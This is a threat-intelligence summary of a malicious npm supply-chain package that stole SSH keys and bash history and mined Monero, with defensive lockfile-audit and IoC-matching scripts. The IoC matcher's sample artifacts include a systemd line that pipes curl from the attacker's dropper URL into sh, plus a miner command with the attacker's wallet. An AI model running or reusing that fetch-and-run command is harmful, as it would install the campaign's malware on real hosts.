Summary:
The Checkmarx Research team has uncovered a year-long supply chain attack involving the malicious npm package @0xengine/xmlrpc, which started life as a legitimate XML-RPC implementation and was later turned into a tool for stealing sensitive data and mining cryptocurrency. The incident shows why dependencies need ongoing monitoring rather than a one-time review: a package that was clean when it was first adopted can become malicious in a routine update.
#SupplyChainSecurity #MaliciousPackages #OpenSourceRisks
Keypoints:
- A malicious NPM package, @0xengine/xmlrpc, has been active from October 2023 to November 2024, receiving 16 updates.
- The package transitioned from a legitimate XML-RPC implementation to a malicious tool by introducing obfuscated code in later versions.
- Every 12 hours it harvests sensitive data (including SSH keys and bash history) and exfiltrates it through Dropbox and file.io; alongside this it runs a Monero miner (XMRig, per the IoC list) on the compromised host.
- Distribution occurred via direct npm installation and as a dependency in a legitimate GitHub repository.
- The malware employs evasion techniques to avoid detection (the xprintidle binary in the IoC list is consistent with idle-time checks used to throttle mining while a user is active) and has been found on up to 68 compromised systems.
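Because the package reached victims both as a direct install and as a transitive dependency of another project, the practical first check is a lockfile audit that reports the full pull-in chain. The script below is an added example, not Checkmarx's or the package maintainer's code; it handles npm lockfile v1 (nested) and v2/v3 (flat `packages` map), and the sample lockfiles, the library name `example-lib` and the version strings in them are constructed for illustration.

```python
"""Audit an npm lockfile for a known-malicious package, including transitive
pull-ins. Added example; sample lockfiles below are constructed."""
import json

# The package from the Checkmarx report. Every version is treated as
# untrusted: the clean early releases are what got it into dependency trees.
MALICIOUS_PACKAGES = {"@0xengine/xmlrpc"}


def _chain_from_key(key):
    """'node_modules/a/node_modules/@s/b' -> ['a', '@s/b'] (lockfile v2/v3 keys)."""
    return [p.strip("/") for p in key.split("node_modules/") if p.strip("/")]


def _walk_v1(deps, path, hits):
    """lockfileVersion 1 nests transitive deps under each package entry."""
    for name, meta in (deps or {}).items():
        chain = path + [name]
        if name in MALICIOUS_PACKAGES:
            hits.append({"name": name, "version": meta.get("version"), "via": chain})
        _walk_v1(meta.get("dependencies"), chain, hits)


def find_malicious(lock):
    """Return one hit per installed copy. 'via' is the dependency chain;
    a single-element chain means the package is a direct dependency."""
    hits = []
    if "packages" in lock:  # lockfileVersion 2 or 3
        for key, meta in lock["packages"].items():
            if not key:  # "" is the root project itself
                continue
            chain = _chain_from_key(key)
            if chain and chain[-1] in MALICIOUS_PACKAGES:
                hits.append({"name": chain[-1], "version": meta.get("version"), "via": chain})
    elif "dependencies" in lock:  # lockfileVersion 1
        _walk_v1(lock["dependencies"], [], hits)
    return hits


def audit_lockfile_text(text):
    """Convenience wrapper for the contents of a package-lock.json file."""
    return find_malicious(json.loads(text))


# Constructed v3 lockfile: the package appears both as a direct dependency
# and nested under a hypothetical library "example-lib". Versions are illustrative.
SAMPLE_LOCK_V3 = json.dumps({
    "name": "example-app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app", "dependencies": {"@0xengine/xmlrpc": "*"}},
        "node_modules/@0xengine/xmlrpc": {"version": "1.0.0"},
        "node_modules/example-lib": {"version": "2.0.0"},
        "node_modules/example-lib/node_modules/@0xengine/xmlrpc": {"version": "1.0.0"},
    },
})

# Constructed lockfile in the older nested v1 layout (transitive only).
SAMPLE_LOCK_V1 = json.dumps({
    "name": "example-app", "lockfileVersion": 1,
    "dependencies": {
        "example-lib": {
            "version": "2.0.0",
            "dependencies": {"@0xengine/xmlrpc": {"version": "1.0.0"}},
        },
    },
})

if __name__ == "__main__":
    for hit in audit_lockfile_text(SAMPLE_LOCK_V3) + audit_lockfile_text(SAMPLE_LOCK_V1):
        print(f"{hit['name']}@{hit['version']} pulled in via {' -> '.join(hit['via'])}")
```

Run it against a real `package-lock.json` by reading the file into `audit_lockfile_text`; a chain longer than one element is the transitive case the report describes, where the malicious package arrived through an otherwise legitimate project.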
MITRE ATT&CK Techniques:
- Compromise Software Supply Chain (T1195.002): a package that was legitimate in its early releases shipped obfuscated malicious code in later updates, so any project depending on it, directly or transitively, pulled the malware in with a routine update.
- Unsecured Credentials: Bash History (T1552.003) and Private Keys (T1552.004): collects SSH keys and bash history from the host.
- Archive Collected Data (T1560): the harvested data is packaged and encrypted before it leaves the host.
- Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002): Dropbox and file.io are used to send the data out, blending in with ordinary HTTPS traffic to popular services.
- Resource Hijacking (T1496): mines Monero (XMRig) on compromised systems.
- Create or Modify System Process: Systemd Service (T1543.002): installs a systemd service to maintain presence on infected systems.
IoC:
- [url] hxxps[:]//codeberg[.]org/k0rn66/xmrdropper/raw/branch/master/xprintidle
- [url] hxxps[:]//codeberg[.]org/k0rn66/xmrdropper/raw/branch/master/xmrig
- [url] hxxps[:]//codeberg[.]org/k0rn66/xmrdropper/raw/branch/master/Xsession.sh
- [wallet address] 45J3v3ooxT335ENFjJBB3s7WS7xGekEKiBW4Z6sRSTUa5Kbn8fbqwgC47SLUDdKsri7haj7PBi5Wvf3xLmrX9CEZ3MGEVJU
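The indicators above are most useful when applied to what persists on a host: systemd unit files, cron entries, dropped scripts and process command lines. The matcher below is an added example, not Checkmarx tooling. The artifact paths and contents are constructed to show what a hit looks like and are not samples from the campaign; beyond the exact indicators, it also flags any other 95-character Monero-style address as a generic lead, which goes beyond the list on this page and should be treated as a pointer rather than proof.

```python
"""Match published IoCs against host artifacts. Added example; the artifact
paths and contents below are constructed, not captured from the campaign."""
import re

IOC_URLS = [
    "codeberg.org/k0rn66/xmrdropper/raw/branch/master/xprintidle",
    "codeberg.org/k0rn66/xmrdropper/raw/branch/master/xmrig",
    "codeberg.org/k0rn66/xmrdropper/raw/branch/master/Xsession.sh",
]
IOC_WALLET = ("45J3v3ooxT335ENFjJBB3s7WS7xGekEKiBW4Z6sRSTUa5Kbn8fbqwgC47SLUDdKsri7haj7PBi5Wvf3xLmrX9CEZ3MGEVJU")

# Generic lead: a Monero standard address is 95 base58 characters starting with
# '4' (base58 has no 0, O, I or l). This catches a swapped-out wallet the exact
# indicator would miss; it is a hint to investigate, not a confirmed hit.
MONERO_ADDR_RE = re.compile(r"(?<![1-9A-HJ-NP-Za-km-z])4[1-9A-HJ-NP-Za-km-z]{94}(?![1-9A-HJ-NP-Za-km-z])")


def scan_text(text):
    """Return a list of (indicator_type, matched_value) tuples found in text."""
    # Normalise defanged forms so hxxps[:]//codeberg[.]org and https://codeberg.org match alike.
    norm = text.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")
    hits = []
    for url in IOC_URLS:
        if url in norm:
            hits.append(("url", url))
    if IOC_WALLET in norm:
        hits.append(("wallet", IOC_WALLET))
    for m in MONERO_ADDR_RE.finditer(norm):
        if m.group(0) != IOC_WALLET:  # the exact wallet is already reported above
            hits.append(("monero-address-like", m.group(0)))
    return hits


def scan_artifacts(artifacts):
    """artifacts: {path: content}. Returns {path: hits} for every path with a hit."""
    report = {}
    for path, content in artifacts.items():
        hits = scan_text(content)
        if hits:
            report[path] = hits
    return report


# Constructed artifacts with hypothetical paths: a persistence unit that pulls
# the dropper script, a miner launcher carrying the wallet, and a benign unit.
ARTIFACTS = {
    "/etc/systemd/system/example-persist.service": (
        "[Service]\n"
        "ExecStart=/bin/sh -c 'curl -s https://codeberg.org/k0rn66/xmrdropper/raw/branch/master/Xsession.sh | sh'\n"
        "[Install]\nWantedBy=multi-user.target\n"
    ),
    "/tmp/example-miner.sh": (
        "./xmrig -o pool.example.invalid:3333 -u "
        "45J3v3ooxT335ENFjJBB3s7WS7xGekEKiBW4Z6sRSTUa5Kbn8fbqwgC47SLUDdKsri7haj7PBi5Wvf3xLmrX9CEZ3MGEVJU\n"
    ),
    "/etc/systemd/system/clean.service": "[Service]\nExecStart=/usr/bin/true\n",
}

if __name__ == "__main__":
    for path, hits in scan_artifacts(ARTIFACTS).items():
        for kind, value in hits:
            print(f"{path}: {kind} {value}")
```

On a live host, feed `scan_artifacts` a mapping built from `/etc/systemd/system`, `~/.config/systemd/user`, crontabs and `/proc/*/cmdline`; the defanging normalisation lets the same function run over threat-intel text and over raw host data without maintaining two indicator lists.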
Full Research: https://checkmarx.com/blog/npm-supply-chain-attack-combines-crypto-mining-and-data-theft/